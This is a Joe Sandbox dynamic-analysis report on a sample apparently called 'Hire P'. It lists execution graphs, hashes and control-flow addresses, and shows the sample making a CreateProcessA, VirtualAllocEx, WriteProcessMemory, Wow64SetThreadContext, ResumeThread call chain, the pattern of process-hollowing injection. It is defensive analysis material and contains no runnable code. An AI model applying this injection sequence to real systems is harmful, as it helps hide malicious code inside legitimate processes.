                                                            execution_graph 47059 880b630 47060 880b7bb 47059->47060 47062 880b656 47059->47062 47062->47060 47063 8805d58 47062->47063 47064 880b8b0 PostMessageW 47063->47064 47065 880b91c 47064->47065 47065->47062 46812 4f14290 46813 4f14302 46812->46813 46814 4f143ac 46812->46814 46815 4f1435a CallWindowProcW 46813->46815 46817 4f14309 46813->46817 46818 4f1113c 46814->46818 46815->46817 46820 4f11147 46818->46820 46821 4f12c69 46820->46821 46822 4f11264 CallWindowProcW 46820->46822 46822->46821 46797 282d3c0 46798 282d3c4 46797->46798 46802 282d590 46798->46802 46805 282d5a0 46798->46805 46799 282d4f3 46808 282b014 46802->46808 46806 282d5ce 46805->46806 46807 282b014 DuplicateHandle 46805->46807 46806->46799 46807->46806 46809 282d608 DuplicateHandle 46808->46809 46811 282d5ce 46809->46811 46811->46799 47066 282b030 47067 282b03f 47066->47067 47070 282b117 47066->47070 47075 282b128 47066->47075 47071 282b15c 47070->47071 47072 282b139 47070->47072 47071->47067 47072->47071 47073 282b360 GetModuleHandleW 47072->47073 47074 282b38d 47073->47074 47074->47067 47076 282b15c 47075->47076 47078 282b139 47075->47078 47076->47067 47077 282b360 GetModuleHandleW 47079 282b38d 47077->47079 47078->47076 47078->47077 47079->47067 46823 8809a64 46824 88099ab 46823->46824 46826 88099f4 46823->46826 46825 88099bb 46824->46825 46829 880a2e8 46824->46829 46844 880a2f8 46824->46844 46830 880a312 46829->46830 46859 880a8b0 46830->46859 46863 880a8ff 46830->46863 46868 880a86e 46830->46868 46873 880ac5d 46830->46873 46878 880a92d 46830->46878 46882 880a74b 46830->46882 46887 880ab3a 46830->46887 46892 880a89a 46830->46892 46897 880aa19 46830->46897 46902 880a7c7 46830->46902 46907 880a904 46830->46907 46912 880ac22 46830->46912 46831 880a31a 46831->46825 46845 880a312 46844->46845 46847 880a8b0 2 API calls 46845->46847 46848 880ac22 2 API calls 46845->46848 46849 880a904 2 API calls 46845->46849 46850 880a7c7 2 API calls 46845->46850 46851 880aa19 2 API calls 46845->46851 46852 880a89a 2 API calls 46845->46852 46853 880ab3a 2 API calls 46845->46853 46854 880a74b 2 API calls 46845->46854 46855 880a92d 2 API calls 46845->46855 46856 880ac5d 2 API calls 46845->46856 46857 880a86e 2 API calls 46845->46857 46858 880a8ff 2 API calls 46845->46858 46846 880a31a 46846->46825 46847->46846 46848->46846 46849->46846 46850->46846 46851->46846 46852->46846 46853->46846 46854->46846 46855->46846 46856->46846 46857->46846 46858->46846 46917 8808f52 46859->46917 46922 8808f58 46859->46922 46860 880a8d2 46860->46831 46864 880acbc 46863->46864 46926 8808cd0 46864->46926 46930 8808cca 46864->46930 46865 880a835 46869 880a894 46868->46869 46934 88087e0 46869->46934 46938 88087e8 46869->46938 46870 880b049 46874 880b102 46873->46874 46876 8808cd0 Wow64SetThreadContext 46874->46876 46877 8808cca Wow64SetThreadContext 46874->46877 46875 880b11d 46876->46875 46877->46875 46942 8808e62 46878->46942 46947 8808e68 46878->46947 46879 880a835 46879->46831 46883 880a755 46882->46883 46884 880a80d 46883->46884 46951 8809528 46883->46951 46955 880951c 46883->46955 46884->46831 46888 880ab40 46887->46888 46889 880aefa 46888->46889 46890 8808e62 WriteProcessMemory 46888->46890 46891 8808e68 WriteProcessMemory 46888->46891 46890->46888 46891->46888 46893 880ab51 46892->46893 46894 880aefa 46893->46894 46895 8808e62 WriteProcessMemory 46893->46895 46896 8808e68 WriteProcessMemory 46893->46896 46895->46893 46896->46893 46898 880aa26 46897->46898 46900 88087e0 ResumeThread 46898->46900 46901 88087e8 ResumeThread 46898->46901 46899 880b049 46900->46899 46901->46899 46903 880a7cd 46902->46903 46905 8809528 CreateProcessA 46903->46905 46906 880951c CreateProcessA 46903->46906 46904 880a80d 46904->46831 46905->46904 46906->46904 46908 880a927 46907->46908 46910 8808e62 WriteProcessMemory 46908->46910 46911 8808e68 WriteProcessMemory 46908->46911 46909 880b1db 46910->46909 46911->46909 46913 880ac28 46912->46913 46914 880a835 46913->46914 46960 8808da0 46913->46960 46964 8808da8 46913->46964 46918 8808f27 46917->46918 46919 8808f57 ReadProcessMemory 46917->46919 46918->46860 46921 8808fe7 46919->46921 46921->46860 46923 8808fa3 ReadProcessMemory 46922->46923 46925 8808fe7 46923->46925 46925->46860 46927 8808d15 Wow64SetThreadContext 46926->46927 46929 8808d5d 46927->46929 46929->46865 46931 8808cd0 Wow64SetThreadContext 46930->46931 46933 8808d5d 46931->46933 46933->46865 46935 88087e8 ResumeThread 46934->46935 46937 8808859 46935->46937 46937->46870 46939 8808828 ResumeThread 46938->46939 46941 8808859 46939->46941 46941->46870 46943 8808e37 46942->46943 46944 8808e67 WriteProcessMemory 46942->46944 46943->46879 46946 8808f07 46944->46946 46946->46879 46948 8808eb0 WriteProcessMemory 46947->46948 46950 8808f07 46948->46950 46950->46879 46952 88095b1 CreateProcessA 46951->46952 46954 8809773 46952->46954 46956 88094f7 46955->46956 46957 8809527 CreateProcessA 46955->46957 46956->46884 46959 8809773 46957->46959 46961 8808da8 VirtualAllocEx 46960->46961 46963 8808e25 46961->46963 46963->46914 46965 8808de8 VirtualAllocEx 46964->46965 46967 8808e25 46965->46967 46967->46914 47080 ead01c 47081 ead034 47080->47081 47082 ead08e 47081->47082 47087 4f1113c CallWindowProcW 47081->47087 47088 4f11e97 47081->47088 47093 4f11ea8 47081->47093 47097 4f11ef8 47081->47097 47105 4f12c08 47081->47105 47087->47082 47089 4f11e82 47088->47089 47090 4f11e7a 47088->47090 47089->47088 47091 4f11eef 47089->47091 47092 4f1113c CallWindowProcW 47089->47092 47090->47082 47091->47082 47092->47091 47094 4f11eac 47093->47094 47095 4f11eef 47094->47095 47096 4f1113c CallWindowProcW 47094->47096 47095->47082 47096->47095 47098 4f11ee2 47097->47098 47102 4f11f03 47097->47102 47099 4f11eee 47098->47099 47100 4f1113c CallWindowProcW 47098->47100 47103 4f12c08 CallWindowProcW 47099->47103 47104 4f1113c CallWindowProcW 47099->47104 47100->47099 47101 4f11eef 47101->47082 47102->47082 47103->47101 47104->47101 47107 4f12c45 47105->47107 47108 4f12c69 47107->47108 47109 4f11264 CallWindowProcW 47107->47109 47109->47108 47110 4f179c8 47111 4f179f5 47110->47111 47114 4f174cc 47111->47114 47113 4f17ab3 47115 4f174d7 47114->47115 47117 4f1ab4d 47115->47117 47118 4f17694 47115->47118 47117->47113 47119 4f1769f 47118->47119 47122 2825d4c CreateWindowExW 47119->47122 47123 2827321 47119->47123 47120 4f1ace4 47120->47117 47122->47120 47124 282737b 47123->47124 47125 2825d7c CreateWindowExW 47124->47125 47126 28273ed 47125->47126 47126->47120 46968 2824668 46969 282467a 46968->46969 46970 2824686 46969->46970 46974 2824778 46969->46974 46979 2824204 46970->46979 46972 28246a5 46975 282479d 46974->46975 46983 2824888 46975->46983 46987 2824878 46975->46987 46980 282420f 46979->46980 46995 2825cfc 46980->46995 46982 282701a 46982->46972 46984 28248af 46983->46984 46985 282498c 46984->46985 46991 28244f0 46984->46991 46989 28248af 46987->46989 46988 282498c 46988->46988 46989->46988 46990 28244f0 CreateActCtxA 46989->46990 46990->46988 46992 2825918 CreateActCtxA 46991->46992 46994 28259db 46992->46994 46996 2825d07 46995->46996 46999 2825d1c 46996->46999 46998 2827215 46998->46982 47000 2825d27 46999->47000 47003 2825d4c 47000->47003 47002 28272fa 47002->46998 47004 2825d57 47003->47004 47007 2825d7c 47004->47007 47006 28273ed 47006->47002 47009 2825d87 47007->47009 47008 2828989 47008->47006 47009->47008 47012 282cce0 47009->47012 47018 282ccf0 47009->47018 47013 282cd11 47012->47013 47014 282cd35 47013->47014 47024 282d300 47013->47024 47028 282d299 47013->47028 47032 282d2a8 47013->47032 47014->47008 47019 282cd11 47018->47019 47020 282cd35 47019->47020 47021 282d300 CreateWindowExW 47019->47021 47022 282d2a8 CreateWindowExW 47019->47022 47023 282d299 CreateWindowExW 47019->47023 47020->47008 47021->47020 47022->47020 47023->47020 47025 282d2c0 47024->47025 47026 282d2ef 47025->47026 47036 282d0d0 47025->47036 47026->47014 47029 282d2b5 47028->47029 47030 282d2ef 47029->47030 47031 282d0d0 CreateWindowExW 47029->47031 47030->47014 47031->47030 47033 282d2b5 47032->47033 47034 282d0d0 CreateWindowExW 47033->47034 47035 282d2ef 47033->47035 47034->47035 47035->47014 47037 282d0db 47036->47037 47039 282dc00 47037->47039 47040 282d1ec 47037->47040 47039->47039 47041 282d1f7 47040->47041 47042 2825d7c CreateWindowExW 47041->47042 47043 282dc6f 47042->47043 47047 282f9e8 47043->47047 47053 282fa00 47043->47053 47044 282dca9 47044->47039 47049 282fa31 47047->47049 47050 282fb31 47047->47050 47048 282fa3d 47048->47044 47049->47048 47051 4f109c0 CreateWindowExW 47049->47051 47052 4f109b0 CreateWindowExW 47049->47052 47050->47044 47051->47050 47052->47050 47055 282fa31 47053->47055 47056 282fb31 47053->47056 47054 282fa3d 47054->47044 47055->47054 47057 4f109c0 CreateWindowExW 47055->47057 47058 4f109b0 CreateWindowExW 47055->47058 47056->47044 47057->47056 47058->47056

                                                            Executed Functions

                                                            Function 08469270 Relevance: 15.7, Strings: 10, Instructions: 3157COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$4'_q$4'_q$4'_q$4'_q$4'_q$4'_q$4|dq$4|dq$$_q
                                                            • API String ID: 0-1079538806
                                                            • Opcode ID: da32797d67e569f8d7dbbbc6bf7b5024301b79502c7d366f8f37b4bbc7a28a6d
                                                            • Instruction ID: 0f0093ba2f71355bb8e9cdfba2b0706364dfaf61baf5320efbe5804e9665af58
                                                            • Opcode Fuzzy Hash: da32797d67e569f8d7dbbbc6bf7b5024301b79502c7d366f8f37b4bbc7a28a6d
                                                            • Instruction Fuzzy Hash: 58631A74A00219CFCB24DF68C988A9DBBB2FF49321F15859AD419AB361DB30ED91CF51
                                                            Function 0880BC68 Relevance: .6, Instructions: 583COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ceea2b0d295188ebcd53f1dce052b743bf30137d56d3fe18cffc3e15bb7d0d91
                                                            • Instruction ID: 7176351c21a5e18843832255810328845d76b8fc824c02dcd57e071cfb6c295b
                                                            • Opcode Fuzzy Hash: ceea2b0d295188ebcd53f1dce052b743bf30137d56d3fe18cffc3e15bb7d0d91
                                                            • Instruction Fuzzy Hash: 5E2274387012148FDB58DB69C860BAEB7F7AF88301F244469E546DB7A1CB34ED46CB51
                                                            Function 02826F90 Relevance: .2, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0a3cafd9f936253c9ab56f662c6bbc90309190ac7e13839114a90ff998b0cd2
                                                            • Instruction ID: b6ebc784d1d952e2a609f622f748bddf2ae64d84bd5e6f959ba8197b3fc85eda
                                                            • Opcode Fuzzy Hash: a0a3cafd9f936253c9ab56f662c6bbc90309190ac7e13839114a90ff998b0cd2
                                                            • Instruction Fuzzy Hash: 1851C874E012199FDB08DFA9D955AEEBBF2FF88300F148469D408AB268DB305846CF50
                                                            Function 02824204 Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d9afec219805dddf4f2752d83bcdb887e741f945b23d7222e5fae61b6e106af
                                                            • Instruction ID: b2775a27ebd571f702407dbbca0446a51af44617e1e3aa769d7e3ebbf10c60c9
                                                            • Opcode Fuzzy Hash: 7d9afec219805dddf4f2752d83bcdb887e741f945b23d7222e5fae61b6e106af
                                                            • Instruction Fuzzy Hash: 2D519774E012199FDB08DFA9D995AEEBBF2FF88300F148429E409AB268DB315945CF50
                                                            Function 0880384A Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b779f485eb0a99bd082b508a7c3aa3cc159c8ed706f6bb2f9dfd50a52713f4b
                                                            • Instruction ID: de7532e6f9204f91ad1b69c4a4eec158921bfd8c9c425821feea5cb74cbb0137
                                                            • Opcode Fuzzy Hash: 1b779f485eb0a99bd082b508a7c3aa3cc159c8ed706f6bb2f9dfd50a52713f4b
                                                            • Instruction Fuzzy Hash: C921E5B0D056188BEB58CFABC9447DEFFB6AF89305F14C06AD408AA2A4DB7409498F50
                                                            Function 08803858 Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4de1e14201414976ede7caf16eae14a2cbc2e37947d5e98732c31e37640aa4b0
                                                            • Instruction ID: b538ed1df953343764adfcaf28dbe4e172737f9c12ff191888b0b22160d7fa58
                                                            • Opcode Fuzzy Hash: 4de1e14201414976ede7caf16eae14a2cbc2e37947d5e98732c31e37640aa4b0
                                                            • Instruction Fuzzy Hash: DE21E4B0D046188BEB58CF9BC8457DEFEF6AFC8305F14D06AD409A62A4DB7409458F50
                                                            Function 08467C30 Relevance: 6.5, Strings: 5, Instructions: 295COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1238 8467c30-8467c5a 1239 8467c63-8467c67 1238->1239 1240 8467c5c 1238->1240 1241 8467c7e-8467c99 1239->1241 1242 8467c69-8467c6d 1239->1242 1240->1239 1250 8467ca4-8467ca8 1241->1250 1251 8467c9b 1241->1251 1243 8467c73-8467c7b 1242->1243 1244 8467f3e-8467f49 1242->1244 1243->1241 1249 8467f50-8467fb4 1244->1249 1273 8467fbb-846801f 1249->1273 1252 8467cb3-8467cd7 1250->1252 1253 8467caa-8467cb0 1250->1253 1251->1250 1260 8467e72-8467e84 1252->1260 1261 8467cdd-8467ce2 1252->1261 1253->1252 1331 8467e87 call 8468647 1260->1331 1332 8467e87 call 84684f9 1260->1332 1333 8467ce5 call 84680f8 1261->1333 1334 8467ce5 call 8468108 1261->1334 1263 8467ceb-8467cef 1263->1249 1266 8467cf5-8467cf9 1263->1266 1264 8467e8d 1267 8467f2f-8467f36 1264->1267 1266->1249 1268 8467cff-8467d09 1266->1268 1272 8467d0f-8467d13 1268->1272 1268->1273 1272->1260 1275 8467d19-8467d1d 1272->1275 1299 8468026-846808a 1273->1299 1277 8467d1f-8467d26 1275->1277 1278 8467d2c-8467d30 1275->1278 1277->1260 1277->1278 1279 8467d36-8467d46 1278->1279 1280 8468091-84680a5 1278->1280 1285 8467d76-8467d7c 1279->1285 1286 8467d48-8467d4e 1279->1286 1287 8467d80-8467d8c 1285->1287 1288 8467d7e 1285->1288 1289 8467d52-8467d5e 1286->1289 1290 8467d50 1286->1290 1292 8467d8e-8467dac 1287->1292 1288->1292 1291 8467d60-8467d70 1289->1291 1290->1291 1291->1285 1291->1299 1292->1260 1300 8467db2-8467db4 1292->1300 1299->1280 1301 8467db6-8467dca 1300->1301 1302 8467dcf-8467dd3 1300->1302 1301->1267 1302->1260 1304 8467dd9-8467de3 1302->1304 1304->1260 1311 8467de9-8467def 1304->1311 1312 8467df5-8467df8 1311->1312 1313 8467f39 1311->1313 1312->1280 1315 8467dfe-8467e1b 1312->1315 1313->1244 1321 8467e1d-8467e38 1315->1321 1322 8467e59-8467e6d 1315->1322 1328 8467e40-8467e54 1321->1328 1329 8467e3a-8467e3e 1321->1329 1322->1267 1328->1267 1329->1260 1329->1328 1331->1264 1332->1264 1333->1263 1334->1263
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                            • API String ID: 0-4110691418
                                                            • Opcode ID: 3f5e8bb702a47e3f7c7f9aae66188ea7871ec327aecfdafe43bdd7fb2015e426
                                                            • Instruction ID: 371173de7edf8e00c0adea421a0f91cbc0ae6f1af40e3154e492c296bfae69ac
                                                            • Opcode Fuzzy Hash: 3f5e8bb702a47e3f7c7f9aae66188ea7871ec327aecfdafe43bdd7fb2015e426
                                                            • Instruction Fuzzy Hash: 5BB17A30B102089FCB14DF68D958AAE7BF6FF88715F108569E406AB3A4DB34DC11CB92
                                                            Function 0846CD14 Relevance: 5.5, Strings: 4, Instructions: 459COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1335 846cd14-846cd22 1336 846cd82-846cdb4 1335->1336 1339 846cdb6-846cdc2 1336->1339 1340 846cdde 1336->1340 1341 846cdc4-846cdca 1339->1341 1342 846cdcc-846cdd2 1339->1342 1343 846cde4-846ce11 1340->1343 1345 846cddc 1341->1345 1342->1345 1347 846ce13-846ce4b 1343->1347 1348 846ce60-846cef3 1343->1348 1345->1343 1353 846d2b7-846d2bc 1347->1353 1366 846cef5 1348->1366 1367 846cefc-846cefd 1348->1367 1354 846d2d3-846d2f2 1353->1354 1355 846d2be-846d2cc 1353->1355 1359 846cc5d-846cc69 1354->1359 1360 846d2f8-846d2ff 1354->1360 1355->1354 1361 846cc70-846cc8b 1359->1361 1362 846cc6b 1359->1362 1364 846d321-846d32d 1361->1364 1365 846cc91-846ccb6 1361->1365 1362->1361 1369 846d333-846d33f 1364->1369 1365->1369 1373 846ccbc-846ccbe 1365->1373 1366->1367 1368 846cf4e-846cf54 1367->1368 1371 846cf56-846d018 1368->1371 1372 846ceff-846cf1e 1368->1372 1374 846d345-846d34d 1369->1374 1398 846d01a-846d053 1371->1398 1399 846d059-846d05d 1371->1399 1376 846cf25-846cf4b 1372->1376 1377 846cf20 1372->1377 1375 846ccc1-846cccc 1373->1375 1375->1374 1379 846ccd2-846ccef 1375->1379 1376->1368 1377->1376 1383 846cd78-846cd7c 1379->1383 1383->1336 1386 846ccf4-846cd0b 1383->1386 1389 846cd0e-846cd12 1386->1389 1389->1335 1391 846cd24-846cd2a 1389->1391 1392 846cd6f-846cd73 1391->1392 1393 846cd75 1392->1393 1394 846cd2c-846cd38 1392->1394 1393->1383 1396 846cd3f-846cd47 1394->1396 1397 846cd3a 1394->1397 1402 846cd6c 1396->1402 1403 846cd49-846cd5d 1396->1403 1397->1396 1398->1399 1400 846d09e-846d0a2 1399->1400 1401 846d05f-846d098 1399->1401 1404 846d0a4-846d0dd 1400->1404 1405 846d0e3-846d0e7 1400->1405 1401->1400 1402->1392 1403->1375 1407 846cd63-846cd6a 1403->1407 1404->1405 1409 846d14a-846d1a5 1405->1409 1410 846d0e9-846d0f1 1405->1410 1407->1393 1417 846d1a7-846d1da 1409->1417 1418 846d1dc-846d206 1409->1418 1412 846d138-846d13c 1410->1412 1412->1389 1413 846d142-846d148 1412->1413 1413->1409 1415 846d0f3-846d135 1413->1415 1415->1412 1423 846d20f-846d27c 1417->1423 1418->1423 1426 846d282-846d28e 1423->1426 1427 846d295-846d2a8 1426->1427 1427->1353
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'_q$:$pcq$~
                                                            • API String ID: 0-1589365477
                                                            • Opcode ID: 143390c6800df6c0045f8831ff4ec9cdd1b2ae3516878d49d43cf447c6ea300c
                                                            • Instruction ID: 6a9710a39ac5f8fed7a4ae8692734db3d6aa041c5326fa9a4072daa70493db4e
                                                            • Opcode Fuzzy Hash: 143390c6800df6c0045f8831ff4ec9cdd1b2ae3516878d49d43cf447c6ea300c
                                                            • Instruction Fuzzy Hash: CA22C075A00218DFDB15CFA8C984E99BBB2FF48314F1180D9E509AB265C732ED91DF11
                                                            Function 08467C20 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2807 8467c20-8467c5a 2808 8467c63-8467c67 2807->2808 2809 8467c5c 2807->2809 2810 8467c7e-8467c99 2808->2810 2811 8467c69-8467c6d 2808->2811 2809->2808 2819 8467ca4-8467ca8 2810->2819 2820 8467c9b 2810->2820 2812 8467c73-8467c7b 2811->2812 2813 8467f3e-8467f49 2811->2813 2812->2810 2818 8467f50-8467fb4 2813->2818 2842 8467fbb-846801f 2818->2842 2821 8467cb3-8467cd7 2819->2821 2822 8467caa-8467cb0 2819->2822 2820->2819 2829 8467e72-8467e84 2821->2829 2830 8467cdd-8467ce2 2821->2830 2822->2821 2902 8467e87 call 8468647 2829->2902 2903 8467e87 call 84684f9 2829->2903 2900 8467ce5 call 84680f8 2830->2900 2901 8467ce5 call 8468108 2830->2901 2832 8467ceb-8467cef 2832->2818 2835 8467cf5-8467cf9 2832->2835 2833 8467e8d 2836 8467f2f-8467f36 2833->2836 2835->2818 2837 8467cff-8467d09 2835->2837 2841 8467d0f-8467d13 2837->2841 2837->2842 2841->2829 2844 8467d19-8467d1d 2841->2844 2868 8468026-846808a 2842->2868 2846 8467d1f-8467d26 2844->2846 2847 8467d2c-8467d30 2844->2847 2846->2829 2846->2847 2848 8467d36-8467d46 2847->2848 2849 8468091-84680a5 2847->2849 2854 8467d76-8467d7c 2848->2854 2855 8467d48-8467d4e 2848->2855 2856 8467d80-8467d8c 2854->2856 2857 8467d7e 2854->2857 2858 8467d52-8467d5e 2855->2858 2859 8467d50 2855->2859 2861 8467d8e-8467dac 2856->2861 2857->2861 2860 8467d60-8467d70 2858->2860 2859->2860 2860->2854 2860->2868 2861->2829 2869 8467db2-8467db4 2861->2869 2868->2849 2870 8467db6-8467dca 2869->2870 2871 8467dcf-8467dd3 2869->2871 2870->2836 2871->2829 2873 8467dd9-8467de3 2871->2873 2873->2829 2880 8467de9-8467def 2873->2880 2881 8467df5-8467df8 2880->2881 2882 8467f39 2880->2882 2881->2849 2884 8467dfe-8467e1b 2881->2884 2882->2813 2890 8467e1d-8467e38 2884->2890 2891 8467e59-8467e6d 2884->2891 2897 8467e40-8467e54 2890->2897 2898 8467e3a-8467e3e 2890->2898 2891->2836 2897->2836 2898->2829 2898->2897 2900->2832 2901->2832 2902->2833 2903->2833
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o_q$,cq
                                                            • API String ID: 0-3128450471
                                                            • Opcode ID: be2478646371070159f79805125417ec13941721badb32187d951b4e39737800
                                                            • Instruction ID: 47a898a1e4ededbcf85614cc2da5ac8a1290eec61574ec19f7994d1affd721aa
                                                            • Opcode Fuzzy Hash: be2478646371070159f79805125417ec13941721badb32187d951b4e39737800
                                                            • Instruction Fuzzy Hash: 24511634E11219CFCB24CF68D584AAEBBF1FF4872AF14856AE815A7360DB309C55CB91
                                                            Function 0880951C Relevance: 1.8, APIs: 1, Instructions: 260processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2925 880951c-8809525 2926 88094f7-8809510 2925->2926 2927 8809527-88095bd 2925->2927 2930 88095f6-8809616 2927->2930 2931 88095bf-88095c9 2927->2931 2938 8809618-8809622 2930->2938 2939 880964f-880967e 2930->2939 2931->2930 2932 88095cb-88095cd 2931->2932 2933 88095f0-88095f3 2932->2933 2934 88095cf-88095d9 2932->2934 2933->2930 2936 88095db 2934->2936 2937 88095dd-88095ec 2934->2937 2936->2937 2937->2937 2940 88095ee 2937->2940 2938->2939 2941 8809624-8809626 2938->2941 2945 8809680-880968a 2939->2945 2946 88096b7-8809771 CreateProcessA 2939->2946 2940->2933 2943 8809628-8809632 2941->2943 2944 8809649-880964c 2941->2944 2947 8809634 2943->2947 2948 8809636-8809645 2943->2948 2944->2939 2945->2946 2949 880968c-880968e 2945->2949 2959 8809773-8809779 2946->2959 2960 880977a-8809800 2946->2960 2947->2948 2948->2948 2950 8809647 2948->2950 2951 8809690-880969a 2949->2951 2952 88096b1-88096b4 2949->2952 2950->2944 2954 880969c 2951->2954 2955 880969e-88096ad 2951->2955 2952->2946 2954->2955 2955->2955 2956 88096af 2955->2956 2956->2952 2959->2960 2970 8809810-8809814 2960->2970 2971 8809802-8809806 2960->2971 2973 8809824-8809828 2970->2973 2974 8809816-880981a 2970->2974 2971->2970 2972 8809808 2971->2972 2972->2970 2976 8809838-880983c 2973->2976 2977 880982a-880982e 2973->2977 2974->2973 2975 880981c 2974->2975 2975->2973 2978 880984e-8809855 2976->2978 2979 880983e-8809844 2976->2979 2977->2976 2980 8809830 2977->2980 2981 8809857-8809866 2978->2981 2982 880986c 2978->2982 2979->2978 2980->2976 2981->2982 2984 880986d 2982->2984 2984->2984
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0880975E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 0f8c8f2d99569ed20f3ae6f5ba35d54ebe3b53acb939d648bca310dec4450fa2
                                                            • Instruction ID: 2cf9ff48564e11189eda55eef5bcff638973ff813bb4cc0204864bf2bbdc7f4b
                                                            • Opcode Fuzzy Hash: 0f8c8f2d99569ed20f3ae6f5ba35d54ebe3b53acb939d648bca310dec4450fa2
                                                            • Instruction Fuzzy Hash: 47A17971D00219CFDB60CFA8CC41BEEBBB2BB48315F148169E859E7281DB759985CF91
                                                            Function 08809528 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2985 8809528-88095bd 2987 88095f6-8809616 2985->2987 2988 88095bf-88095c9 2985->2988 2995 8809618-8809622 2987->2995 2996 880964f-880967e 2987->2996 2988->2987 2989 88095cb-88095cd 2988->2989 2990 88095f0-88095f3 2989->2990 2991 88095cf-88095d9 2989->2991 2990->2987 2993 88095db 2991->2993 2994 88095dd-88095ec 2991->2994 2993->2994 2994->2994 2997 88095ee 2994->2997 2995->2996 2998 8809624-8809626 2995->2998 3002 8809680-880968a 2996->3002 3003 88096b7-8809771 CreateProcessA 2996->3003 2997->2990 3000 8809628-8809632 2998->3000 3001 8809649-880964c 2998->3001 3004 8809634 3000->3004 3005 8809636-8809645 3000->3005 3001->2996 3002->3003 3006 880968c-880968e 3002->3006 3016 8809773-8809779 3003->3016 3017 880977a-8809800 3003->3017 3004->3005 3005->3005 3007 8809647 3005->3007 3008 8809690-880969a 3006->3008 3009 88096b1-88096b4 3006->3009 3007->3001 3011 880969c 3008->3011 3012 880969e-88096ad 3008->3012 3009->3003 3011->3012 3012->3012 3013 88096af 3012->3013 3013->3009 3016->3017 3027 8809810-8809814 3017->3027 3028 8809802-8809806 3017->3028 3030 8809824-8809828 3027->3030 3031 8809816-880981a 3027->3031 3028->3027 3029 8809808 3028->3029 3029->3027 3033 8809838-880983c 3030->3033 3034 880982a-880982e 3030->3034 3031->3030 3032 880981c 3031->3032 3032->3030 3035 880984e-8809855 3033->3035 3036 880983e-8809844 3033->3036 3034->3033 3037 8809830 3034->3037 3038 8809857-8809866 3035->3038 3039 880986c 3035->3039 3036->3035 3037->3033 3038->3039 3041 880986d 3039->3041 3041->3041
                                                            APIs
